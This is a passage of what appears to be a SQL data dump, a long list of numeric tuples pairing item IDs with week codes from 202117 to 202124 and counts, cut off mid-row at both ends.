,1,'202117',43),(1600,1,'202117',44),(68,1,'202117',46),(1586,1,'202117',48),(80,1,'202117',71),(1602,1,'202117',89),(9,1,'202117',508),(106,1,'202118',2),(110,1,'202118',2),(1739,1,'202118',3),(3263,1,'202118',3),(3297,1,'202118',3),(471,1,'202118',4),(484,1,'202118',4),(1699,1,'202118',4),(1743,1,'202118',4),(2165,1,'202118',4),(3124,1,'202118',4),(3249,1,'202118',4),(3251,1,'202118',4),(3269,1,'202118',4),(3273,1,'202118',4),(3280,1,'202118',4),(3290,1,'202118',4),(486,1,'202118',5),(488,1,'202118',5),(1703,1,'202118',5),(1707,1,'202118',5),(1713,1,'202118',5),(1730,1,'202118',5),(1747,1,'202118',5),(1766,1,'202118',5),(2148,1,'202118',5),(2558,1,'202118',5),(2964,1,'202118',5),(3117,1,'202118',5),(3229,1,'202118',5),(3257,1,'202118',5),(3259,1,'202118',5),(3275,1,'202118',5),(479,1,'202118',6),(1701,1,'202118',6),(1711,1,'202118',6),(1715,1,'202118',6),(1724,1,'202118',6),(1732,1,'202118',6),(1745,1,'202118',6),(1772,1,'202118',6),(1776,1,'202118',6),(2063,1,'202118',6),(2252,1,'202118',6),(2296,1,'202118',6),(2804,1,'202118',6),(3245,1,'202118',6),(3267,1,'202118',6),(3278,1,'202118',6),(3316,1,'202118',6),(487,1,'202118',7),(1705,1,'202118',7),(1722,1,'202118',7),(1741,1,'202118',7),(1749,1,'202118',7),(1770,1,'202118',7),(1782,1,'202118',7),(2150,1,'202118',7),(2748,1,'202118',7),(2989,1,'202118',7),(3027,1,'202118',7),(3063,1,'202118',7),(3069,1,'202118',7),(3087,1,'202118',7),(3090,1,'202118',7),(3096,1,'202118',7),(3097,1,'202118',7),(3247,1,'202118',7),(3271,1,'202118',7),(3482,1,'202118',7),(102,1,'202118',8),(469,1,'202118',8),(472,1,'202118',8),(476,1,'202118',8),(478,1,'202118',8),(483,1,'202118',8),(1544,1,'202118',8),(1697,1,'202118',8),(1728,1,'202118',8),(1737,1,'202118',8),(1751,1,'202118',8),(1768,1,'202118',8),(1774,1,'202118',8),(1778,1,'202118',8),(1780,1,'202118',8),(2156,1,'202118',8),(2159,1,'202118',8),(2178,1,'202118',8),(2297,1,'202118',8),(2911,1,'202118',8),(2993,1,'202118',8),(3023,1,'202118',8),(3034,1,'202118',8),(3066,1,'202118',8),(3104,1,'202118',8),(3240,1,'202118',8),(3307,1,'202118',8),(3313,1,'202118',8),(3438,1,'202118',8),(3710,1,'202118',8),(474,1,'202118',9),(477,1,'202118',9),(480,1,'202118',9),(481,1,'202118',9),(482,1,'202118',9),(1584,1,'202118',9),(1590,1,'202118',9),(1606,1,'202118',9),(1709,1,'202118',9),(1720,1,'202118',9),(2293,1,'202118',9),(2775,1,'202118',9),(2809,1,'202118',9),(2965,1,'202118',9),(3004,1,'202118',9),(3006,1,'202118',9),(3038,1,'202118',9),(3109,1,'202118',9),(3127,1,'202118',9),(3261,1,'202118',9),(3265,1,'202118',9),(3479,1,'202118',9),(467,1,'202118',10),(485,1,'202118',10),(1726,1,'202118',10),(1734,1,'202118',10),(2152,1,'202118',10),(2609,1,'202118',10),(2658,1,'202118',10),(2813,1,'202118',10),(3107,1,'202118',10),(3430,1,'202118',10),(3486,1,'202118',10),(468,1,'202118',11),(1612,1,'202118',11),(2154,1,'202118',11),(2617,1,'202118',11),(2801,1,'202118',11),(2991,1,'202118',11),(3041,1,'202118',11),(3045,1,'202118',11),(3072,1,'202118',11),(3092,1,'202118',11),(3243,1,'202118',11),(3253,1,'202118',11),(1695,1,'202118',12),(2248,1,'202118',12),(2751,1,'202118',12),(473,1,'202118',13),(1592,1,'202118',13),(1610,1,'202118',13),(1614,1,'202118',13),(3079,1,'202118',13),(3083,1,'202118',13),(3102,1,'202118',13),(2704,1,'202118',14),(3005,1,'202118',14),(3226,1,'202118',14),(3489,1,'202118',14),(1596,1,'202118',15),(1604,1,'202118',15),(2956,1,'202118',15),(470,1,'202118',16),(2769,1,'202118',16),(3060,1,'202118',16),(1718,1,'202118',17),(2161,1,'202118',17),(3030,1,'202118',17),(570,1,'202118',18),(1598,1,'202118',18),(3285,1,'202118',18),(3287,1,'202118',18),(335,1,'202118',19),(1588,1,'202118',19),(2457,1,'202118',19),(3498,1,'202118',19),(3541,1,'202118',19),(74,1,'202118',22),(1582,1,'202118',23),(84,1,'202118',24),(87,1,'202118',24),(2904,1,'202118',24),(3531,1,'202118',25),(3282,1,'202118',26),(3534,1,'202118',26),(108,1,'202118',28),(89,1,'202118',29),(2503,1,'202118',29),(2309,1,'202118',30),(91,1,'202118',32),(1600,1,'202118',32),(76,1,'202118',33),(68,1,'202118',35),(72,1,'202118',36),(1608,1,'202118',36),(1594,1,'202118',38),(1602,1,'202118',38),(1586,1,'202118',40),(80,1,'202118',60),(9,1,'202118',500),(486,1,'202119',1),(106,1,'202119',2),(110,1,'202119',2),(467,1,'202119',2),(3247,1,'202119',2),(476,1,'202119',3),(479,1,'202119',3),(483,1,'202119',3),(488,1,'202119',3),(1584,1,'202119',3),(1699,1,'202119',3),(1705,1,'202119',3),(2150,1,'202119',3),(2558,1,'202119',3),(2956,1,'202119',3),(3023,1,'202119',3),(3107,1,'202119',3),(3117,1,'202119',3),(3124,1,'202119',3),(3271,1,'202119',3),(477,1,'202119',4),(482,1,'202119',4),(1695,1,'202119',4),(1728,1,'202119',4),(1730,1,'202119',4),(1732,1,'202119',4),(1743,1,'202119',4),(1772,1,'202119',4),(1782,1,'202119',4),(2148,1,'202119',4),(2165,1,'202119',4),(2293,1,'202119',4),(2297,1,'202119',4),(2964,1,'202119',4),(2965,1,'202119',4),(2991,1,'202119',4),(3063,1,'202119',4),(3079,1,'202119',4),(3096,1,'202119',4),(3243,1,'202119',4),(3249,1,'202119',4),(3267,1,'202119',4),(3275,1,'202119',4),(3297,1,'202119',4),(3307,1,'202119',4),(3316,1,'202119',4),(3479,1,'202119',4),(3482,1,'202119',4),(480,1,'202119',5),(1703,1,'202119',5),(1718,1,'202119',5),(1722,1,'202119',5),(1734,1,'202119',5),(1739,1,'202119',5),(1741,1,'202119',5),(1766,1,'202119',5),(1768,1,'202119',5),(1774,1,'202119',5),(1780,1,'202119',5),(2152,1,'202119',5),(2252,1,'202119',5),(2296,1,'202119',5),(2748,1,'202119',5),(2993,1,'202119',5),(3006,1,'202119',5),(3092,1,'202119',5),(3127,1,'202119',5),(3245,1,'202119',5),(3257,1,'202119',5),(3259,1,'202119',5),(3263,1,'202119',5),(3269,1,'202119',5),(3280,1,'202119',5),(3313,1,'202119',5),(3438,1,'202119',5),(3486,1,'202119',5),(102,1,'202119',6),(471,1,'202119',6),(485,1,'202119',6),(487,1,'202119',6),(1590,1,'202119',6),(1701,1,'202119',6),(1720,1,'202119',6),(1745,1,'202119',6),(1747,1,'202119',6),(2063,1,'202119',6),(2154,1,'202119',6),(2658,1,'202119',6),(2775,1,'202119',6),(2989,1,'202119',6),(3090,1,'202119',6),(3229,1,'202119',6),(3265,1,'202119',6),(3273,1,'202119',6),(468,1,'202119',7),(469,1,'202119',7),(472,1,'202119',7),(474,1,'202119',7),(481,1,'202119',7),(1707,1,'202119',7),(1713,1,'202119',7),(1749,1,'202119',7),(2156,1,'202119',7),(2161,1,'202119',7),(2751,1,'202119',7),(2911,1,'202119',7),(3027,1,'202119',7),(3034,1,'202119',7),(3041,1,'202119',7),(3069,1,'202119',7),(3083,1,'202119',7),(3097,1,'202119',7),(3253,1,'202119',7),(3278,1,'202119',7),(3290,1,'202119',7),(484,1,'202119',8),(1544,1,'202119',8),(1697,1,'202119',8),(1737,1,'202119',8),(1751,1,'202119',8),(1770,1,'202119',8),(1776,1,'202119',8),(3102,1,'202119',8),(3104,1,'202119',8),(3109,1,'202119',8),(3240,1,'202119',8),(3251,1,'202119',8),(3430,1,'202119',8),(478,1,'202119',9),(1709,1,'202119',9),(1715,1,'202119',9),(1726,1,'202119',9),(1778,1,'202119',9),(2178,1,'202119',9),(2801,1,'202119',9),(2809,1,'202119',9),(3004,1,'202119',9),(3005,1,'202119',9),(3038,1,'202119',9),(3261,1,'202119',9),(3710,1,'202119',9),(1711,1,'202119',10),(1724,1,'202119',10),(2159,1,'202119',10),(2813,1,'202119',10),(3066,1,'202119',10),(3087,1,'202119',10),(570,1,'202119',11),(1596,1,'202119',11),(1612,1,'202119',11),(2248,1,'202119',11),(2617,1,'202119',11),(2804,1,'202119',11),(3072,1,'202119',11),(470,1,'202119',12),(1592,1,'202119',12),(2769,1,'202119',12),(3045,1,'202119',12),(3226,1,'202119',12),(473,1,'202119',13),(2704,1,'202119',13),(1582,1,'202119',14),(1610,1,'202119',14),(2609,1,'202119',14),(2457,1,'202119',15),(3060,1,'202119',15),(1604,1,'202119',16),(1606,1,'202119',17),(3287,1,'202119',17),(3498,1,'202119',17),(3489,1,'202119',18),(3531,1,'202119',18),(3534,1,'202119',18),(108,1,'202119',19),(84,1,'202119',20),(1608,1,'202119',20),(1614,1,'202119',20),(3282,1,'202119',20),(74,1,'202119',21),(1598,1,'202119',21),(2503,1,'202119',21),(3541,1,'202119',21),(72,1,'202119',22),(2904,1,'202119',22),(3030,1,'202119',22),(3285,1,'202119',22),(87,1,'202119',24),(335,1,'202119',24),(1588,1,'202119',24),(2309,1,'202119',24),(89,1,'202119',26),(68,1,'202119',33),(76,1,'202119',35),(1600,1,'202119',38),(91,1,'202119',45),(1586,1,'202119',46),(1602,1,'202119',48),(1594,1,'202119',56),(80,1,'202119',65),(9,1,'202119',459),(106,1,'202120',1),(110,1,'202120',1),(1737,1,'202120',1),(2156,1,'202120',1),(2956,1,'202120',1),(479,1,'202120',2),(1701,1,'202120',2),(1703,1,'202120',2),(1711,1,'202120',2),(1732,1,'202120',2),(1734,1,'202120',2),(1739,1,'202120',2),(3245,1,'202120',2),(3482,1,'202120',2),(102,1,'202120',3),(482,1,'202120',3),(483,1,'202120',3),(1697,1,'202120',3),(1741,1,'202120',3),(1776,1,'202120',3),(1782,1,'202120',3),(2152,1,'202120',3),(2165,1,'202120',3),(2658,1,'202120',3),(2964,1,'202120',3),(3249,1,'202120',3),(3261,1,'202120',3),(1713,1,'202120',4),(1715,1,'202120',4),(1730,1,'202120',4),(1772,1,'202120',4),(1780,1,'202120',4),(2161,1,'202120',4),(2748,1,'202120',4),(3072,1,'202120',4),(3107,1,'202120',4),(3124,1,'202120',4),(3240,1,'202120',4),(3263,1,'202120',4),(3265,1,'202120',4),(3269,1,'202120',4),(3275,1,'202120',4),(3297,1,'202120',4),(3316,1,'202120',4),(1699,1,'202120',5),(1705,1,'202120',5),(1724,1,'202120',5),(1768,1,'202120',5),(1778,1,'202120',5),(2063,1,'202120',5),(2248,1,'202120',5),(2296,1,'202120',5),(2558,1,'202120',5),(2813,1,'202120',5),(2991,1,'202120',5),(3006,1,'202120',5),(3023,1,'202120',5),(3041,1,'202120',5),(3063,1,'202120',5),(3066,1,'202120',5),(3087,1,'202120',5),(3090,1,'202120',5),(3096,1,'202120',5),(3102,1,'202120',5),(3117,1,'202120',5),(3229,1,'202120',5),(3251,1,'202120',5),(3257,1,'202120',5),(3271,1,'202120',5),(3278,1,'202120',5),(3290,1,'202120',5),(3438,1,'202120',5),(471,1,'202120',6),(477,1,'202120',6),(480,1,'202120',6),(1590,1,'202120',6),(1610,1,'202120',6),(1695,1,'202120',6),(1728,1,'202120',6),(2178,1,'202120',6),(2252,1,'202120',6),(2769,1,'202120',6),(2775,1,'202120',6),(2965,1,'202120',6),(2993,1,'202120',6),(3069,1,'202120',6),(3097,1,'202120',6),(3104,1,'202120',6),(3243,1,'202120',6),(3259,1,'202120',6),(3273,1,'202120',6),(469,1,'202120',7),(484,1,'202120',7),(485,1,'202120',7),(486,1,'202120',7),(488,1,'202120',7),(1707,1,'202120',7),(1709,1,'202120',7),(1743,1,'202120',7),(1749,1,'202120',7),(1751,1,'202120',7),(1770,1,'202120',7),(2150,1,'202120',7),(2293,1,'202120',7),(2617,1,'202120',7),(2704,1,'202120',7),(2804,1,'202120',7),(3004,1,'202120',7),(3005,1,'202120',7),(3092,1,'202120',7),(3109,1,'202120',7),(3253,1,'202120',7),(3307,1,'202120',7),(3430,1,'202120',7),(3710,1,'202120',7),(474,1,'202120',8),(487,1,'202120',8),(1584,1,'202120',8),(1720,1,'202120',8),(1745,1,'202120',8),(2911,1,'202120',8),(3226,1,'202120',8),(3247,1,'202120',8),(3479,1,'202120',8),(481,1,'202120',9),(1604,1,'202120',9),(1718,1,'202120',9),(1722,1,'202120',9),(2154,1,'202120',9),(2801,1,'202120',9),(3027,1,'202120',9),(3038,1,'202120',9),(3045,1,'202120',9),(3079,1,'202120',9),(3313,1,'202120',9),(3486,1,'202120',9),(2148,1,'202120',10),(2809,1,'202120',10),(2989,1,'202120',10),(3034,1,'202120',10),(3083,1,'202120',10),(3267,1,'202120',10),(3280,1,'202120',10),(467,1,'202120',11),(476,1,'202120',11),(1747,1,'202120',11),(2609,1,'202120',11),(478,1,'202120',12),(1608,1,'202120',12),(1726,1,'202120',12),(1766,1,'202120',12),(3127,1,'202120',12),(472,1,'202120',13),(473,1,'202120',13),(3060,1,'202120',13),(570,1,'202120',14),(2159,1,'202120',14),(1592,1,'202120',15),(1614,1,'202120',15),(2457,1,'202120',15),(3282,1,'202120',15),(1774,1,'202120',16),(2309,1,'202120',16),(2751,1,'202120',16),(2297,1,'202120',17),(3285,1,'202120',17),(3714,1,'202120',17),(468,1,'202120',18),(470,1,'202120',18),(2904,1,'202120',18),(335,1,'202120',19),(1544,1,'202120',19),(1582,1,'202120',19),(1606,1,'202120',20),(1612,1,'202120',20),(2503,1,'202120',21),(3489,1,'202120',21),(1596,1,'202120',22),(3030,1,'202120',22),(3287,1,'202120',22),(3498,1,'202120',22),(3534,1,'202120',22),(72,1,'202120',23),(74,1,'202120',23),(1598,1,'202120',23),(3541,1,'202120',23),(3531,1,'202120',24),(108,1,'202120',25),(1588,1,'202120',27),(87,1,'202120',28),(89,1,'202120',29),(84,1,'202120',32),(76,1,'202120',39),(1594,1,'202120',41),(68,1,'202120',44),(91,1,'202120',51),(1586,1,'202120',51),(80,1,'202120',60),(1602,1,'202120',72),(1600,1,'202120',73),(9,1,'202120',481),(106,1,'202121',1),(3290,1,'202121',1),(1713,1,'202121',2),(3023,1,'202121',2),(3083,1,'202121',2),(3226,1,'202121',2),(3240,1,'202121',2),(102,1,'202121',3),(481,1,'202121',3),(482,1,'202121',3),(483,1,'202121',3),(1737,1,'202121',3),(1745,1,'202121',3),(1749,1,'202121',3),(1776,1,'202121',3),(1778,1,'202121',3),(1780,1,'202121',3),(2293,1,'202121',3),(2558,1,'202121',3),(2804,1,'202121',3),(2911,1,'202121',3),(2989,1,'202121',3),(2993,1,'202121',3),(3066,1,'202121',3),(3229,1,'202121',3),(3257,1,'202121',3),(3265,1,'202121',3),(3273,1,'202121',3),(3275,1,'202121',3),(3280,1,'202121',3),(476,1,'202121',4),(479,1,'202121',4),(1584,1,'202121',4),(1705,1,'202121',4),(1732,1,'202121',4),(1739,1,'202121',4),(1772,1,'202121',4),(1782,1,'202121',4),(2063,1,'202121',4),(2152,1,'202121',4),(2154,1,'202121',4),(2252,1,'202121',4),(2296,1,'202121',4),(2748,1,'202121',4),(2813,1,'202121',4),(2956,1,'202121',4),(2965,1,'202121',4),(3006,1,'202121',4),(3090,1,'202121',4),(3092,1,'202121',4),(3127,1,'202121',4),(3243,1,'202121',4),(3251,1,'202121',4),(3261,1,'202121',4),(3263,1,'202121',4),(3269,1,'202121',4),(3316,1,'202121',4),(3482,1,'202121',4),(477,1,'202121',5),(488,1,'202121',5),(1590,1,'202121',5),(1695,1,'202121',5),(1699,1,'202121',5),(1711,1,'202121',5),(1724,1,'202121',5),(1730,1,'202121',5),(1743,1,'202121',5),(1768,1,'202121',5),(2156,1,'202121',5),(2248,1,'202121',5),(2297,1,'202121',5),(2658,1,'202121',5),(2775,1,'202121',5),(2991,1,'202121',5),(3034,1,'202121',5),(3041,1,'202121',5),(3096,1,'202121',5),(3109,1,'202121',5),(3253,1,'202121',5),(3259,1,'202121',5),(3278,1,'202121',5),(3307,1,'202121',5),(3430,1,'202121',5),(471,1,'202121',6),(474,1,'202121',6),(478,1,'202121',6),(485,1,'202121',6),(486,1,'202121',6),(1697,1,'202121',6),(1715,1,'202121',6),(1741,1,'202121',6),(1770,1,'202121',6),(2161,1,'202121',6),(2178,1,'202121',6),(2964,1,'202121',6),(3063,1,'202121',6),(3097,1,'202121',6),(3104,1,'202121',6),(3117,1,'202121',6),(3124,1,'202121',6),(3245,1,'202121',6),(3247,1,'202121',6),(3249,1,'202121',6),(3297,1,'202121',6),(3438,1,'202121',6),(3479,1,'202121',6),(469,1,'202121',7),(470,1,'202121',7),(487,1,'202121',7),(1722,1,'202121',7),(1751,1,'202121',7),(2148,1,'202121',7),(2150,1,'202121',7),(3045,1,'202121',7),(3072,1,'202121',7),(3087,1,'202121',7),(3107,1,'202121',7),(3271,1,'202121',7),(3486,1,'202121',7),(472,1,'202121',8),(484,1,'202121',8),(1701,1,'202121',8),(1728,1,'202121',8),(1734,1,'202121',8),(2165,1,'202121',8),(3069,1,'202121',8),(3079,1,'202121',8),(3102,1,'202121',8),(468,1,'202121',9),(1612,1,'202121',9),(1703,1,'202121',9),(1718,1,'202121',9),(1726,1,'202121',9),(2617,1,'202121',9),(2751,1,'202121',9),(3004,1,'202121',9),(3005,1,'202121',9),(3313,1,'202121',9),(480,1,'202121',10),(1544,1,'202121',10),(1709,1,'202121',10),(1766,1,'202121',10),(1774,1,'202121',10),(2801,1,'202121',10),(473,1,'202121',11),(1720,1,'202121',11),(1747,1,'202121',11),(2159,1,'202121',11),(2769,1,'202121',11),(2809,1,'202121',11),(3027,1,'202121',11),(1707,1,'202121',12),(3038,1,'202121',12),(3060,1,'202121',12),(1614,1,'202121',13),(3267,1,'202121',13),(3710,1,'202121',13),(467,1,'202121',14),(2609,1,'202121',14),(3714,1,'202121',14),(1598,1,'202121',15),(1592,1,'202121',16),(1596,1,'202121',16),(1606,1,'202121',16),(3030,1,'202121',16),(3489,1,'202121',16),(1604,1,'202121',17),(1610,1,'202121',17),(2457,1,'202121',17),(335,1,'202121',18),(570,1,'202121',18),(1582,1,'202121',18),(2704,1,'202121',18),(3287,1,'202121',18),(3285,1,'202121',20),(84,1,'202121',21),(1588,1,'202121',21),(3498,1,'202121',22),(89,1,'202121',23),(2904,1,'202121',23),(3541,1,'202121',23),(74,1,'202121',24),(76,1,'202121',24),(1608,1,'202121',24),(3534,1,'202121',24),(72,1,'202121',25),(3282,1,'202121',25),(68,1,'202121',26),(108,1,'202121',26),(2309,1,'202121',26),(2503,1,'202121',26),(3531,1,'202121',28),(87,1,'202121',30),(1594,1,'202121',36),(1600,1,'202121',44),(1586,1,'202121',51),(80,1,'202121',52),(91,1,'202121',52),(1602,1,'202121',61),(9,1,'202121',473),(1701,1,'202122',1),(2156,1,'202122',1),(2813,1,'202122',1),(2991,1,'202122',1),(3004,1,'202122',1),(481,1,'202122',2),(484,1,'202122',2),(485,1,'202122',2),(1743,1,'202122',2),(1780,1,'202122',2),(1782,1,'202122',2),(2965,1,'202122',2),(2993,1,'202122',2),(3090,1,'202122',2),(3096,1,'202122',2),(3104,1,'202122',2),(3124,1,'202122',2),(3249,1,'202122',2),(3257,1,'202122',2),(3271,1,'202122',2),(3273,1,'202122',2),(3297,1,'202122',2),(3307,1,'202122',2),(469,1,'202122',3),(478,1,'202122',3),(486,1,'202122',3),(1699,1,'202122',3),(1705,1,'202122',3),(1734,1,'202122',3),(1751,1,'202122',3),(1770,1,'202122',3),(2148,1,'202122',3),(2152,1,'202122',3),(2165,1,'202122',3),(2252,1,'202122',3),(2911,1,'202122',3),(3045,1,'202122',3),(3109,1,'202122',3),(3117,1,'202122',3),(3229,1,'202122',3),(3259,1,'202122',3),(3265,1,'202122',3),(3275,1,'202122',3),(3278,1,'202122',3),(482,1,'202122',4),(483,1,'202122',4),(488,1,'202122',4),(570,1,'202122',4),(1703,1,'202122',4),(1707,1,'202122',4),(1713,1,'202122',4),(1749,1,'202122',4),(1768,1,'202122',4),(1772,1,'202122',4),(1776,1,'202122',4),(2063,1,'202122',4),(2154,1,'202122',4),(2248,1,'202122',4),(2296,1,'202122',4),(2804,1,'202122',4),(3005,1,'202122',4),(3006,1,'202122',4),(3034,1,'202122',4),(3127,1,'202122',4),(3247,1,'202122',4),(472,1,'202122',5),(476,1,'202122',5),(1590,1,'202122',5),(1610,1,'202122',5),(1614,1,'202122',5),(1697,1,'202122',5),(1711,1,'202122',5),(1720,1,'202122',5),(1722,1,'202122',5),(1730,1,'202122',5),(2293,1,'202122',5),(2658,1,'202122',5),(2748,1,'202122',5),(2769,1,'202122',5),(3023,1,'202122',5),(3030,1,'202122',5),(3038,1,'202122',5),(3041,1,'202122',5),(3063,1,'202122',5),(3069,1,'202122',5),(3251,1,'202122',5),(3253,1,'202122',5),(3263,1,'202122',5),(3267,1,'202122',5),(3290,1,'202122',5),(3313,1,'202122',5),(3479,1,'202122',5),(3482,1,'202122',5),(473,1,'202122',6),(1709,1,'202122',6),(1739,1,'202122',6),(1747,1,'202122',6),(1774,1,'202122',6),(2150,1,'202122',6),(2297,1,'202122',6),(2751,1,'202122',6),(2801,1,'202122',6),(2809,1,'202122',6),(2956,1,'202122',6),(2964,1,'202122',6),(3066,1,'202122',6),(3072,1,'202122',6),(3079,1,'202122',6),(3087,1,'202122',6),(3092,1,'202122',6),(3245,1,'202122',6),(3261,1,'202122',6),(3430,1,'202122',6),(3486,1,'202122',6),(477,1,'202122',7),(479,1,'202122',7),(1584,1,'202122',7),(1718,1,'202122',7),(1732,1,'202122',7),(1737,1,'202122',7),(1778,1,'202122',7),(3102,1,'202122',7),(3107,1,'202122',7),(3226,1,'202122',7),(3240,1,'202122',7),(3243,1,'202122',7),(3269,1,'202122',7),(3280,1,'202122',7),(3316,1,'202122',7),(3438,1,'202122',7),(102,1,'202122',8),(468,1,'202122',8),(474,1,'202122',8),(480,1,'202122',8),(1596,1,'202122',8),(1728,1,'202122',8),(2558,1,'202122',8),(2989,1,'202122',8),(3083,1,'202122',8),(1695,1,'202122',9),(1766,1,'202122',9),(2161,1,'202122',9),(3027,1,'202122',9),(3097,1,'202122',9),(467,1,'202122',10),(471,1,'202122',10),(487,1,'202122',10),(1715,1,'202122',10),(1724,1,'202122',10),(1726,1,'202122',10),(1741,1,'202122',10),(1745,1,'202122',11),(2609,1,'202122',11),(2775,1,'202122',11),(3489,1,'202122',11),(470,1,'202122',12),(1604,1,'202122',12),(1612,1,'202122',12),(2178,1,'202122',12),(3060,1,'202122',12),(3498,1,'202122',12),(2159,1,'202122',13),(2617,1,'202122',13),(1592,1,'202122',15),(2704,1,'202122',15),(1598,1,'202122',16),(3710,1,'202122',16),(1582,1,'202122',17),(2457,1,'202122',18),(1544,1,'202122',19),(2309,1,'202122',19),(74,1,'202122',20),(3285,1,'202122',22),(3287,1,'202122',22),(3531,1,'202122',22),(3534,1,'202122',22),(1588,1,'202122',23),(1608,1,'202122',23),(2904,1,'202122',23),(3541,1,'202122',23),(84,1,'202122',24),(87,1,'202122',24),(76,1,'202122',25),(1594,1,'202122',25),(2503,1,'202122',26),(89,1,'202122',27),(1606,1,'202122',28),(3282,1,'202122',28),(3714,1,'202122',28),(335,1,'202122',29),(72,1,'202122',31),(68,1,'202122',34),(108,1,'202122',34),(1602,1,'202122',34),(1600,1,'202122',38),(91,1,'202122',43),(1586,1,'202122',45),(80,1,'202122',63),(9,1,'202122',463),(106,1,'202123',2),(2293,1,'202123',3),(2956,1,'202123',3),(488,1,'202123',4),(1751,1,'202123',4),(479,1,'202123',5),(480,1,'202123',5),(482,1,'202123',5),(1720,1,'202123',5),(2252,1,'202123',5),(3063,1,'202123',5),(3269,1,'202123',5),(3297,1,'202123',5),(3482,1,'202123',5),(102,1,'202123',6),(474,1,'202123',6),(481,1,'202123',6),(1695,1,'202123',6),(1722,1,'202123',6),(1732,1,'202123',6),(1737,1,'202123',6),(1739,1,'202123',6),(1745,1,'202123',6),(1782,1,'202123',6),(2154,1,'202123',6),(2296,1,'202123',6),(2748,1,'202123',6),(2809,1,'202123',6),(2964,1,'202123',6),(3041,1,'202123',6),(3090,1,'202123',6),(3107,1,'202123',6),(3117,1,'202123',6),(3124,1,'202123',6),(3273,1,'202123',6),(3275,1,'202123',6),(3278,1,'202123',6),(3280,1,'202123',6),(3479,1,'202123',6),(1697,1,'202123',7),(1703,1,'202123',7),(1713,1,'202123',7),(1768,1,'202123',7),(1776,1,'202123',7),(2156,1,'202123',7),(2165,1,'202123',7),(2558,1,'202123',7),(2993,1,'202123',7),(3023,1,'202123',7),(3027,1,'202123',7),(3045,1,'202123',7),(3072,1,'202123',7),(3092,1,'202123',7),(3096,1,'202123',7),(3109,1,'202123',7),(3240,1,'202123',7),(3257,1,'202123',7),(3271,1,'202123',7),(3316,1,'202123',7),(3438,1,'202123',7),(3498,1,'202123',7),(471,1,'202123',8),(483,1,'202123',8),(1699,1,'202123',8),(2063,1,'202123',8),(2148,1,'202123',8),(2248,1,'202123',8),(3004,1,'202123',8),(3038,1,'202123',8),(3226,1,'202123',8),(3229,1,'202123',8),(3249,1,'202123',8),(3253,1,'202123',8),(3263,1,'202123',8),(3486,1,'202123',8),(467,1,'202123',9),(468,1,'202123',9),(472,1,'202123',9),(485,1,'202123',9),(486,1,'202123',9),(1584,1,'202123',9),(1705,1,'202123',9),(1711,1,'202123',9),(1724,1,'202123',9),(1743,1,'202123',9),(1749,1,'202123',9),(1770,1,'202123',9),(1772,1,'202123',9),(2150,1,'202123',9),(2152,1,'202123',9),(2775,1,'202123',9),(2801,1,'202123',9),(2813,1,'202123',9),(2965,1,'202123',9),(3066,1,'202123',9),(3097,1,'202123',9),(3245,1,'202123',9),(3265,1,'202123',9),(3307,1,'202123',9),(3489,1,'202123',9),(473,1,'202123',10),(487,1,'202123',10),(1590,1,'202123',10),(1701,1,'202123',10),(1707,1,'202123',10),(1709,1,'202123',10),(1715,1,'202123',10),(1728,1,'202123',10),(1734,1,'202123',10),(1741,1,'202123',10),(2991,1,'202123',10),(3005,1,'202123',10),(3069,1,'202123',10),(3267,1,'202123',10),(3430,1,'202123',10),(478,1,'202123',11),(1726,1,'202123',11),(1730,1,'202123',11),(1774,1,'202123',11),(1778,1,'202123',11),(2658,1,'202123',11),(2751,1,'202123',11),(2769,1,'202123',11),(2804,1,'202123',11),(2989,1,'202123',11),(3006,1,'202123',11),(3034,1,'202123',11),(3079,1,'202123',11),(3243,1,'202123',11),(3251,1,'202123',11),(3259,1,'202123',11),(3290,1,'202123',11),(3313,1,'202123',11),(469,1,'202123',12),(476,1,'202123',12),(477,1,'202123',12),(570,1,'202123',12),(1614,1,'202123',12),(1747,1,'202123',12),(1766,1,'202123',12),(1780,1,'202123',12),(2178,1,'202123',12),(3087,1,'202123',12),(470,1,'202123',13),(1610,1,'202123',13),(2297,1,'202123',13),(3060,1,'202123',13),(3102,1,'202123',13),(3104,1,'202123',13),(3127,1,'202123',13),(484,1,'202123',14),(1612,1,'202123',14),(2161,1,'202123',14),(3083,1,'202123',14),(3247,1,'202123',14),(2617,1,'202123',15),(2704,1,'202123',16),(1598,1,'202123',17),(1604,1,'202123',17),(1718,1,'202123',17),(1544,1,'202123',18),(1596,1,'202123',18),(2911,1,'202123',18),(3261,1,'202123',18),(1592,1,'202123',19),(2609,1,'202123',19),(3534,1,'202123',19),(2904,1,'202123',20),(3287,1,'202123',20),(335,1,'202123',21),(1606,1,'202123',21),(3282,1,'202123',21),(3531,1,'202123',21),(84,1,'202123',22),(3285,1,'202123',22),(3710,1,'202123',22),(1588,1,'202123',23),(1608,1,'202123',23),(2457,1,'202123',23),(2503,1,'202123',23),(72,1,'202123',24),(87,1,'202123',24),(3030,1,'202123',24),(74,1,'202123',25),(1582,1,'202123',25),(89,1,'202123',26),(3541,1,'202123',26),(108,1,'202123',27),(1600,1,'202123',27),(3714,1,'202123',28),(1586,1,'202123',30),(76,1,'202123',32),(2159,1,'202123',32),(68,1,'202123',34),(2309,1,'202123',36),(1594,1,'202123',41),(1602,1,'202123',48),(91,1,'202123',49),(80,1,'202123',57),(9,1,'202123',485),(479,1,'202124',1),(485,1,'202124',1),(486,1,'202124',1),(2161,1,'202124',1),(3063,1,'202124',1),(3066,1,'202124',1),(3096,1,'202124',1),(3240,1,'202124',1),(102,1,'202124',2),(1590,1,'202124',2),(1695,1,'202124',2),(1737,1,'202124',2),(2293,1,'202124',2),(2993,1,'202124',2),(3090,1,'202124',2),(3107,1,'202124',2),(3273,1,'202124',2),(106,1,'202124',3),(481,1,'202124',3),(1713,1,'202124',3),(1720,1,'202124',3),(1768,1,'202124',3),(2063,1,'202124',3),(2658,1,'202124',3),(2748,1,'202124',3),(3097,1,'202124',3),(3259,1,'202124',3),(3265,1,'202124',3),(3267,1,'202124',3),(3280,1,'202124',3),(3290,1,'202124',3),(3489,1,'202124',3),(467,1,'202124',4),(476,1,'202124',4),(478,1,'202124',4),(488,1,'202124',4),(1707,1,'202124',4),(1715,1,'202124',4),(1724,1,'202124',4),(1732,1,'202124',4),(1739,1,'202124',4),(1751,1,'202124',4),(2248,1,'202124',4),(2964,1,'202124',4),(2991,1,'202124',4),(3006,1,'202124',4),(3038,1,'202124',4),(3079,1,'202124',4),(3243,1,'202124',4),(3249,1,'202124',4),(3257,1,'202124',4),(3275,1,'202124',4),(3316,1,'202124',4),(3479,1,'202124',4),(3482,1,'202124',4),(474,1,'202124',5),(477,1,'202124',5),(1699,1,'202124',5),(1701,1,'202124',5),(1703,1,'202124',5),(1705,1,'202124',5),(1726,1,'202124',5),(1776,1,'202